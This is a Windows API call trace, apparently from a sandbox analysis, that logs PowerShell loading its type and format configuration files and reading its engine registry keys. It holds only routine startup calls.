	[0470.401] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22d6c0 | out: lpFileInformation=0x22d6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0470.401] SetErrorMode (uMode=0x1) returned 0x1
	[0470.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x22d3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0470.403] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d7a8 | out: phkResult=0x22d7a8*=0x338) returned 0x0
	[0470.403] RegQueryValueExW (in: hKey=0x338, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d72c, lpData=0x0, lpcbData=0x22d728*=0x0 | out: lpType=0x22d72c*=0x1, lpData=0x0, lpcbData=0x22d728*=0x56) returned 0x0
	[0470.403] CoTaskMemAlloc (cb=0x5a) returned 0x1b3a68e0
	[0470.403] RegQueryValueExW (in: hKey=0x338, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d6fc, lpData=0x1b3a68e0, lpcbData=0x22d6f8*=0x56 | out: lpType=0x22d6fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22d6f8*=0x56) returned 0x0
	[0470.403] CoTaskMemFree (pv=0x1b3a68e0) 
	[0470.403] RegCloseKey (hKey=0x338) returned 0x0
	[0470.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x22d3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0470.404] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x22d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0471.086] GetSystemInfo (in: lpSystemInfo=0x22c3e0 | out: lpSystemInfo=0x22c3e0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0471.087] VirtualQuery (in: lpAddress=0x22c490, lpBuffer=0x22d350, dwLength=0x30 | out: lpBuffer=0x22d350*(BaseAddress=0x22c000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0471.103] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0471.103] GetFileType (hFile=0x330) returned 0x1
	[0471.103] SetErrorMode (uMode=0x1) returned 0x1
	[0471.103] GetFileType (hFile=0x330) returned 0x1
	[0471.103] ReadFile (in: hFile=0x330, lpBuffer=0x2b95938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2b95938*, lpNumberOfBytesRead=0x22d748*=0x1000, lpOverlapped=0x0) returned 1
	[0471.104] ReadFile (in: hFile=0x330, lpBuffer=0x2b95938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2b95938*, lpNumberOfBytesRead=0x22d748*=0x1000, lpOverlapped=0x0) returned 1
	[0471.104] ReadFile (in: hFile=0x330, lpBuffer=0x2b95938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2b95938*, lpNumberOfBytesRead=0x22d748*=0x1000, lpOverlapped=0x0) returned 1
	[0471.104] ReadFile (in: hFile=0x330, lpBuffer=0x2b95938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2b95938*, lpNumberOfBytesRead=0x22d748*=0x1000, lpOverlapped=0x0) returned 1
	[0471.105] ReadFile (in: hFile=0x330, lpBuffer=0x2b95938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2b95938*, lpNumberOfBytesRead=0x22d748*=0x1000, lpOverlapped=0x0) returned 1
	[0471.105] ReadFile (in: hFile=0x330, lpBuffer=0x2b95938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2b95938*, lpNumberOfBytesRead=0x22d748*=0x1000, lpOverlapped=0x0) returned 1
	[0471.105] ReadFile (in: hFile=0x330, lpBuffer=0x2b95938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2b95938*, lpNumberOfBytesRead=0x22d748*=0x1000, lpOverlapped=0x0) returned 1
	[0471.105] ReadFile (in: hFile=0x330, lpBuffer=0x2b95938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2b95938*, lpNumberOfBytesRead=0x22d748*=0x1000, lpOverlapped=0x0) returned 1
	[0471.105] ReadFile (in: hFile=0x330, lpBuffer=0x2b95938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2b95938*, lpNumberOfBytesRead=0x22d748*=0x1000, lpOverlapped=0x0) returned 1
	[0471.106] ReadFile (in: hFile=0x330, lpBuffer=0x2b95938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2b95938*, lpNumberOfBytesRead=0x22d748*=0x1000, lpOverlapped=0x0) returned 1
	[0471.106] ReadFile (in: hFile=0x330, lpBuffer=0x2b95938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2b95938*, lpNumberOfBytesRead=0x22d748*=0x1000, lpOverlapped=0x0) returned 1
	[0471.107] ReadFile (in: hFile=0x330, lpBuffer=0x2b95938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2b95938*, lpNumberOfBytesRead=0x22d748*=0x1000, lpOverlapped=0x0) returned 1
	[0471.107] ReadFile (in: hFile=0x330, lpBuffer=0x2b95938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2b95938*, lpNumberOfBytesRead=0x22d748*=0x1000, lpOverlapped=0x0) returned 1
	[0471.107] ReadFile (in: hFile=0x330, lpBuffer=0x2b95938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2b95938*, lpNumberOfBytesRead=0x22d748*=0x1000, lpOverlapped=0x0) returned 1
	[0471.107] ReadFile (in: hFile=0x330, lpBuffer=0x2b95938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2b95938*, lpNumberOfBytesRead=0x22d748*=0x1000, lpOverlapped=0x0) returned 1
	[0471.108] ReadFile (in: hFile=0x330, lpBuffer=0x2b95938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2b95938*, lpNumberOfBytesRead=0x22d748*=0x1000, lpOverlapped=0x0) returned 1
	[0471.108] ReadFile (in: hFile=0x330, lpBuffer=0x2b95938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2b95938*, lpNumberOfBytesRead=0x22d748*=0x1000, lpOverlapped=0x0) returned 1
	[0471.109] ReadFile (in: hFile=0x330, lpBuffer=0x2b95938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2b95938*, lpNumberOfBytesRead=0x22d748*=0x1000, lpOverlapped=0x0) returned 1
	[0471.109] ReadFile (in: hFile=0x330, lpBuffer=0x2b95938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2b95938*, lpNumberOfBytesRead=0x22d748*=0x1000, lpOverlapped=0x0) returned 1
	[0471.110] ReadFile (in: hFile=0x330, lpBuffer=0x2b95938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2b95938*, lpNumberOfBytesRead=0x22d748*=0x1000, lpOverlapped=0x0) returned 1
	[0471.110] ReadFile (in: hFile=0x330, lpBuffer=0x2b95938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2b95938*, lpNumberOfBytesRead=0x22d748*=0x1000, lpOverlapped=0x0) returned 1
	[0471.110] ReadFile (in: hFile=0x330, lpBuffer=0x2b95938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2b95938*, lpNumberOfBytesRead=0x22d748*=0x1000, lpOverlapped=0x0) returned 1
	[0471.110] ReadFile (in: hFile=0x330, lpBuffer=0x2b95938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2b95938*, lpNumberOfBytesRead=0x22d748*=0x1000, lpOverlapped=0x0) returned 1
	[0471.110] ReadFile (in: hFile=0x330, lpBuffer=0x2b95938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2b95938*, lpNumberOfBytesRead=0x22d748*=0x1000, lpOverlapped=0x0) returned 1
	[0471.111] ReadFile (in: hFile=0x330, lpBuffer=0x2b95938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2b95938*, lpNumberOfBytesRead=0x22d748*=0x1000, lpOverlapped=0x0) returned 1
	[0471.111] ReadFile (in: hFile=0x330, lpBuffer=0x2b95938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2b95938*, lpNumberOfBytesRead=0x22d748*=0x1000, lpOverlapped=0x0) returned 1
	[0471.111] ReadFile (in: hFile=0x330, lpBuffer=0x2b95938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2b95938*, lpNumberOfBytesRead=0x22d748*=0x1000, lpOverlapped=0x0) returned 1
	[0471.111] ReadFile (in: hFile=0x330, lpBuffer=0x2b95938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2b95938*, lpNumberOfBytesRead=0x22d748*=0x1000, lpOverlapped=0x0) returned 1
	[0471.112] ReadFile (in: hFile=0x330, lpBuffer=0x2b95938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2b95938*, lpNumberOfBytesRead=0x22d748*=0x1000, lpOverlapped=0x0) returned 1
	[0471.112] ReadFile (in: hFile=0x330, lpBuffer=0x2b95938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2b95938*, lpNumberOfBytesRead=0x22d748*=0x1000, lpOverlapped=0x0) returned 1
	[0471.112] ReadFile (in: hFile=0x330, lpBuffer=0x2b95938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2b95938*, lpNumberOfBytesRead=0x22d748*=0x1000, lpOverlapped=0x0) returned 1
	[0471.112] ReadFile (in: hFile=0x330, lpBuffer=0x2b95938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2b95938*, lpNumberOfBytesRead=0x22d748*=0x1000, lpOverlapped=0x0) returned 1
	[0471.112] ReadFile (in: hFile=0x330, lpBuffer=0x2b95938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2b95938*, lpNumberOfBytesRead=0x22d748*=0x1000, lpOverlapped=0x0) returned 1
	[0471.115] ReadFile (in: hFile=0x330, lpBuffer=0x2b95938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2b95938*, lpNumberOfBytesRead=0x22d748*=0x1000, lpOverlapped=0x0) returned 1
	[0471.115] ReadFile (in: hFile=0x330, lpBuffer=0x2b95938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2b95938*, lpNumberOfBytesRead=0x22d748*=0x1000, lpOverlapped=0x0) returned 1
	[0471.115] ReadFile (in: hFile=0x330, lpBuffer=0x2b95938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2b95938*, lpNumberOfBytesRead=0x22d748*=0x1000, lpOverlapped=0x0) returned 1
	[0471.115] ReadFile (in: hFile=0x330, lpBuffer=0x2b95938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2b95938*, lpNumberOfBytesRead=0x22d748*=0x1000, lpOverlapped=0x0) returned 1
	[0471.115] ReadFile (in: hFile=0x330, lpBuffer=0x2b95938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2b95938*, lpNumberOfBytesRead=0x22d748*=0x1000, lpOverlapped=0x0) returned 1
	[0471.116] ReadFile (in: hFile=0x330, lpBuffer=0x2b95938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2b95938*, lpNumberOfBytesRead=0x22d748*=0x1000, lpOverlapped=0x0) returned 1
	[0471.117] ReadFile (in: hFile=0x330, lpBuffer=0x2b95938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2b95938*, lpNumberOfBytesRead=0x22d748*=0x1000, lpOverlapped=0x0) returned 1
	[0471.119] ReadFile (in: hFile=0x330, lpBuffer=0x2b95938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2b95938*, lpNumberOfBytesRead=0x22d748*=0x1000, lpOverlapped=0x0) returned 1
	[0471.119] ReadFile (in: hFile=0x330, lpBuffer=0x2b95938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2b95938*, lpNumberOfBytesRead=0x22d748*=0x1b4, lpOverlapped=0x0) returned 1
	[0471.119] ReadFile (in: hFile=0x330, lpBuffer=0x2b95938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2b95938*, lpNumberOfBytesRead=0x22d748*=0x0, lpOverlapped=0x0) returned 1
	[0471.119] CloseHandle (hObject=0x330) returned 1
	[0471.120] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x22d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0471.120] SetErrorMode (uMode=0x1) returned 0x1
	[0471.120] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22d6c0 | out: lpFileInformation=0x22d6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0471.120] SetErrorMode (uMode=0x1) returned 0x1
	[0471.120] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x22d3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0471.120] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d7a8 | out: phkResult=0x22d7a8*=0x330) returned 0x0
	[0471.120] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d72c, lpData=0x0, lpcbData=0x22d728*=0x0 | out: lpType=0x22d72c*=0x1, lpData=0x0, lpcbData=0x22d728*=0x56) returned 0x0
	[0471.120] CoTaskMemAlloc (cb=0x5a) returned 0x1b3a6aa0
	[0471.120] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d6fc, lpData=0x1b3a6aa0, lpcbData=0x22d6f8*=0x56 | out: lpType=0x22d6fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22d6f8*=0x56) returned 0x0
	[0471.120] CoTaskMemFree (pv=0x1b3a6aa0) 
	[0471.121] RegCloseKey (hKey=0x330) returned 0x0
	[0471.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x22d3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0471.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x22d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0473.787] VirtualQuery (in: lpAddress=0x22c490, lpBuffer=0x22d350, dwLength=0x30 | out: lpBuffer=0x22d350*(BaseAddress=0x22c000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0474.734] VirtualQuery (in: lpAddress=0x22c490, lpBuffer=0x22d350, dwLength=0x30 | out: lpBuffer=0x22d350*(BaseAddress=0x22c000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0476.604] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0476.604] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0476.604] CoTaskMemFree (pv=0x1b39cff0) 
	[0476.619] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d948 | out: phkResult=0x22d948*=0x330) returned 0x0
	[0476.619] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x22d95c, lpData=0x0, lpcbData=0x22d958*=0x0 | out: lpType=0x22d95c*=0x1, lpData=0x0, lpcbData=0x22d958*=0x74) returned 0x0
	[0476.619] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x22d8cc, lpData=0x0, lpcbData=0x22d8c8*=0x0 | out: lpType=0x22d8cc*=0x1, lpData=0x0, lpcbData=0x22d8c8*=0x74) returned 0x0
	[0476.619] CoTaskMemAlloc (cb=0x78) returned 0x3c41f0
	[0476.619] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x22d89c, lpData=0x3c41f0, lpcbData=0x22d898*=0x74 | out: lpType=0x22d89c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x22d898*=0x74) returned 0x0
	[0476.619] CoTaskMemFree (pv=0x3c41f0) 
	[0476.619] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x22d610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0476.619] SetErrorMode (uMode=0x1) returned 0x1
	[0476.620] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x22d820 | out: lpFileInformation=0x22d820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0476.620] SetErrorMode (uMode=0x1) returned 0x1
	[0476.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0476.621] SetErrorMode (uMode=0x1) returned 0x1
	[0476.621] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22d820 | out: lpFileInformation=0x22d820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0476.621] SetErrorMode (uMode=0x1) returned 0x1
	[0476.622] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0476.622] SetErrorMode (uMode=0x1) returned 0x1
	[0476.622] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22d820 | out: lpFileInformation=0x22d820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0476.622] SetErrorMode (uMode=0x1) returned 0x1
	[0476.622] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0476.622] SetErrorMode (uMode=0x1) returned 0x1
	[0476.622] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22d820 | out: lpFileInformation=0x22d820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0476.622] SetErrorMode (uMode=0x1) returned 0x1
	[0476.622] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0476.623] SetErrorMode (uMode=0x1) returned 0x1
	[0476.623] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22d820 | out: lpFileInformation=0x22d820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0476.623] SetErrorMode (uMode=0x1) returned 0x1
	[0476.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0476.623] SetErrorMode (uMode=0x1) returned 0x1
	[0476.623] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22d820 | out: lpFileInformation=0x22d820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0476.623] SetErrorMode (uMode=0x1) returned 0x1
